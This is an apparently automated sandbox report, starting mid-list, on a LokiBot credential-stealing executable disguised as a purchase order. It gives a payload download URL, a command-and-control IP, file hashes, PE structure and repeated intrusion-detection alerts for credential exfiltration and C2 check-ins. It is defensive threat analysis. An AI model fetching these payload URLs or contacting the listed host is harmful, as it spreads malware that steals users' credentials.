                          https://hrf0ga.bn.files.1drv.com/PO-A2174679-06.exe, 0000000B.00000002.501746377.0000000000A27000.00000004.00000020.sdmpfalse
                            high
                            http://sinatrasmob.com/pro/ovation_byHOXsph232.binPO-A2174679-06.exe, 0000000B.00000002.501095690.0000000000562000.00000040.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            192.185.78.145
                            unknownUnited States
                            46606UNIFIEDLAYER-AS-1UStrue

                            General Information

                            Joe Sandbox Version:31.0.0 Emerald
                            Analysis ID:356484
                            Start date:23.02.2021
                            Start time:08:47:07
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 7m 13s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:PO-A2174679-06.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:23
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@3/2@43/1
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 3.7% (good quality ratio 1%)
                            • Quality average: 10%
                            • Quality standard deviation: 17.1%
                            HCA Information:
                            • Successful, ratio: 70%
                            • Number of executed functions: 66
                            • Number of non-executed functions: 23
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 168.61.161.212, 51.104.139.180, 51.103.5.186, 52.147.198.201, 23.218.209.198, 13.88.21.125, 92.122.145.220, 40.88.32.150, 23.218.208.56, 51.11.168.160, 8.253.204.249, 8.248.117.254, 67.26.73.254, 8.253.204.120, 8.248.133.254, 92.122.213.247, 92.122.213.194, 13.107.42.13, 13.107.43.12, 52.155.217.156, 20.54.26.129
                            • Excluded domains from analysis (whitelisted): odc-bn-files.onedrive.akadns.net.l-0003.dc-msedge.net.l-0003.l-msedge.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, odc-bn-files-geo.onedrive.akadns.net, skypedataprdcoleus15.cloudapp.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, odc-bn-files-brs.onedrive.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, l-0004.l-msedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, displaycatalog.mp.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, odc-web-geo.onedrive.akadns.net, l-0003.dc-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, e16646.dscg.akamaiedge.net, skypedataprdcolwus15.cloudapp.net, vip2-par02p.wns.notify.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            08:49:27API Interceptor38x Sleep call for process: PO-A2174679-06.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            UNIFIEDLAYER-AS-1US22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                            • 108.167.156.42
                            CV-JOB REQUEST______PDF.EXEGet hashmaliciousBrowse
                            • 192.185.181.49
                            PO.exeGet hashmaliciousBrowse
                            • 192.185.0.218
                            Complaint-1091191320-02182021.xlsGet hashmaliciousBrowse
                            • 192.185.16.95
                            ESCANEAR_FACTURA-20794564552_docx.exeGet hashmaliciousBrowse
                            • 162.214.158.75
                            AWB-INVOICE_PDF.exeGet hashmaliciousBrowse
                            • 192.185.46.55
                            iAxkn PDF.exeGet hashmaliciousBrowse
                            • 192.185.100.181
                            carta de pago pdf.exeGet hashmaliciousBrowse
                            • 192.185.5.166
                            PO.exeGet hashmaliciousBrowse
                            • 108.179.232.42
                            payment details.pdf.exeGet hashmaliciousBrowse
                            • 50.87.95.32
                            new order.exeGet hashmaliciousBrowse
                            • 108.179.232.42
                            CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                            • 192.185.181.49
                            RdLlHaxEKP.exeGet hashmaliciousBrowse
                            • 162.214.184.71
                            Drawings2.exeGet hashmaliciousBrowse
                            • 198.57.247.220
                            EFT Remittance.xlsGet hashmaliciousBrowse
                            • 162.241.120.180
                            Remittance Advice.xlsGet hashmaliciousBrowse
                            • 162.241.120.180
                            Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                            • 192.185.17.119
                            Complaint_Letter_1212735678-02192021.xlsGet hashmaliciousBrowse
                            • 192.185.17.119
                            SecuriteInfo.com.BehavesLike.Win32.Generic.ch.exeGet hashmaliciousBrowse
                            • 162.241.194.14
                            SecuriteInfo.com.Trojan.PackedNET.546.1336.exeGet hashmaliciousBrowse
                            • 162.214.184.71

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                            Process:C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 1
                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                            Process:C:\Users\user\Desktop\PO-A2174679-06.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):7379
                            Entropy (8bit):0.6787210715847813
                            Encrypted:false
                            SSDEEP:12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMet:9
                            MD5:DB6D68BC10AB34D28026CA8336B4E986
                            SHA1:7FE6C2D23DC859C0F3C2759679AE97CA6739AC9F
                            SHA-256:E8D86E10D4E8AEA44D547EDB65B18CC175894E362B31152AF38AEA03D9B93DB9
                            SHA-512:DA28A192C54BDD97D81A7D2ECE5B161220B6B7D9DD7C6CDE4F469A8F3EB0161C6A5A0588161377370C89EA9C421AAE396AE0E2BB481C287625A8B31472658D6D
                            Malicious:false
                            Reputation:low
                            Preview: ........................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user........................................................................................user..............

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):5.623116556460363
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.15%
                            • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:PO-A2174679-06.exe
                            File size:86016
                            MD5:fdec289fb4626dd56bbb55770ae5f432
                            SHA1:1a1f324185e6114fb1362b00f27fe8009a202361
                            SHA256:eb53256b217e27a7ab0f71be2181599a79dc0569dea7fdbc5b32cf96a6bc9109
                            SHA512:59cbf20bc1d2fb24430378ec9fa74107c91a6f491b51e9b04911ecd632cce524d4bd56042df8b3bcd8acd448d984bba6290cffa6739960e188d8c055c0f0b0f4
                            SSDEEP:1536:WafMF8sN5NZilPSBWNBEotYaYUtl8DLogSR:WHF95ilSUNBLtYaYUt7
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L.....5U................. ... ...............0....@................

                            File Icon

                            Icon Hash:74fae4f6c0c0f98c

                            Static PE Info

                            General

                            Entrypoint:0x4014c0
                            Entrypoint Section:.text
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp:0x553582A1 [Mon Apr 20 22:50:09 2015 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:40c19fc273c48bb96f5b0a0c56f8b80b

                            Entrypoint Preview

                            Instruction
                            push 0040BA78h
                            call 00007F0FBCF6F3D5h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+2Ah], ch
                            jmp 00007F0FE6D08284h
                            dec ebx
                            wait
                            inc ebx
                            pop es
                            mov esp, eax
                            insb
                            xchg eax, esi
                            pop ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax], eax
                            add byte ptr [eax], al
                            dec eax
                            add byte ptr [esi], al
                            inc eax
                            add dword ptr [ecx], 50h
                            jc 00007F0FBCF6F451h
                            push 00000065h
                            arpl word ptr [ebp+esi+00h], si
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4+00000307h], dh
                            add byte ptr [eax], al
                            dec esp
                            xor dword ptr [eax], eax
                            adc al, A1h
                            loop 00007F0FBCF6F407h
                            inc ebx
                            rcr ebp, FFFFFF87h
                            inc ebp
                            popfd
                            pop es
                            sub dh, byte ptr [esi-22h]
                            into
                            out C3h, al
                            imul esp, dword ptr [esi+42A39078h], 47h
                            xchg eax, edx
                            push ss
                            sbb byte ptr [esi], bl
                            and ah, bh
                            mov dl, 3Ah
                            dec edi
                            lodsd
                            xor ebx, dword ptr [ecx-48EE309Ah]
                            or al, 00h
                            stosb
                            add byte ptr [eax-2Dh], ah
                            xchg eax, ebx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jl 00007F0FBCF6F386h
                            add byte ptr [eax], al
                            pop eax
                            mov eax, dword ptr [0E000000h]
                            add byte ptr [eax+4Fh], cl
                            push esi
                            inc ebp
                            inc esp
                            push edx
                            inc ebp
                            inc edi
                            inc ebp
                            dec esp
                            push eax
                            push ebp
                            dec esi
                            push ebx
                            add byte ptr [50000801h], cl

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x11d540x28.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x8d0.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                            IMAGE_DIRECTORY_ENTRY_IAT0x10000x124.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x10000x112340x12000False0.394232855903data6.11276286566IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                            .data0x130000xac80x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                            .rsrc0x140000x8d00x1000False0.12939453125data1.94796497587IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                            Resources

                            NameRVASizeTypeLanguageCountry
                            RT_ICON0x143680x568GLS_BINARY_LSB_FIRST
                            RT_GROUP_ICON0x143540x14data
                            RT_VERSION0x140f00x264dataChineseTaiwan

                            Imports

                            DLLImport
                            MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaVarErrI4, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaUI1Str, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                            Version Infos

                            DescriptionData
                            Translation0x0404 0x04b0
                            InternalNameyappingextr
                            FileVersion1.06
                            CompanyNameV.Q. Benney
                            ProductNameProject5
                            ProductVersion1.06
                            FileDescriptionV.Q. Benney
                            OriginalFilenameyappingextr.exe

                            Possible Origin

                            Language of compilation systemCountry where language is spokenMap
                            ChineseTaiwan

                            Network Behavior

                            Snort IDS Alerts

                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                            02/23/21-08:49:25.317523TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973280192.168.2.5192.185.78.145
                            02/23/21-08:49:25.317523TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.5192.185.78.145
                            02/23/21-08:49:25.317523TCP2025381ET TROJAN LokiBot Checkin4973280192.168.2.5192.185.78.145
                            02/23/21-08:49:25.317523TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973280192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14973380192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973380192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2025381ET TROJAN LokiBot Checkin4973380192.168.2.5192.185.78.145
                            02/23/21-08:49:26.296646TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24973380192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973480192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973480192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2025381ET TROJAN LokiBot Checkin4973480192.168.2.5192.185.78.145
                            02/23/21-08:49:27.514702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973480192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973580192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973580192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2025381ET TROJAN LokiBot Checkin4973580192.168.2.5192.185.78.145
                            02/23/21-08:49:29.621978TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973580192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2025381ET TROJAN LokiBot Checkin4973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.069635TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973780192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973780192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2025381ET TROJAN LokiBot Checkin4973780192.168.2.5192.185.78.145
                            02/23/21-08:49:31.953353TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973780192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973880192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973880192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2025381ET TROJAN LokiBot Checkin4973880192.168.2.5192.185.78.145
                            02/23/21-08:49:32.896542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973880192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973980192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973980192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2025381ET TROJAN LokiBot Checkin4973980192.168.2.5192.185.78.145
                            02/23/21-08:49:33.755838TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973980192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974080192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974080192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2025381ET TROJAN LokiBot Checkin4974080192.168.2.5192.185.78.145
                            02/23/21-08:49:34.630259TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974080192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974180192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974180192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2025381ET TROJAN LokiBot Checkin4974180192.168.2.5192.185.78.145
                            02/23/21-08:49:35.508751TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974180192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974380192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974380192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2025381ET TROJAN LokiBot Checkin4974380192.168.2.5192.185.78.145
                            02/23/21-08:49:38.359104TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974380192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974480192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974480192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.5192.185.78.145
                            02/23/21-08:49:39.237474TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974480192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974580192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2025381ET TROJAN LokiBot Checkin4974580192.168.2.5192.185.78.145
                            02/23/21-08:49:40.069118TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974580192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2025381ET TROJAN LokiBot Checkin4974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.025088TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974680192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974780192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974780192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.5192.185.78.145
                            02/23/21-08:49:41.847378TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974780192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974880192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974880192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2025381ET TROJAN LokiBot Checkin4974880192.168.2.5192.185.78.145
                            02/23/21-08:49:42.711982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974880192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974980192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974980192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2025381ET TROJAN LokiBot Checkin4974980192.168.2.5192.185.78.145
                            02/23/21-08:49:43.540303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974980192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975080192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975080192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.5192.185.78.145
                            02/23/21-08:49:44.361483TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975080192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975180192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975180192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2025381ET TROJAN LokiBot Checkin4975180192.168.2.5192.185.78.145
                            02/23/21-08:49:45.281076TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975180192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975280192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2025381ET TROJAN LokiBot Checkin4975280192.168.2.5192.185.78.145
                            02/23/21-08:49:46.290244TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2025381ET TROJAN LokiBot Checkin4975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.113450TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975380192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975580192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975580192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2025381ET TROJAN LokiBot Checkin4975580192.168.2.5192.185.78.145
                            02/23/21-08:49:47.991495TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975580192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975980192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975980192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2025381ET TROJAN LokiBot Checkin4975980192.168.2.5192.185.78.145
                            02/23/21-08:49:48.867385TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975980192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976180192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976180192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2025381ET TROJAN LokiBot Checkin4976180192.168.2.5192.185.78.145
                            02/23/21-08:49:49.698286TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976180192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976380192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4976380192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2025381ET TROJAN LokiBot Checkin4976380192.168.2.5192.185.78.145
                            02/23/21-08:49:50.602565TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976380192.168.2.5192.185.78.145
                            02/23/21-08:49:51.403125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976580192.168.2.5192.185.78.145
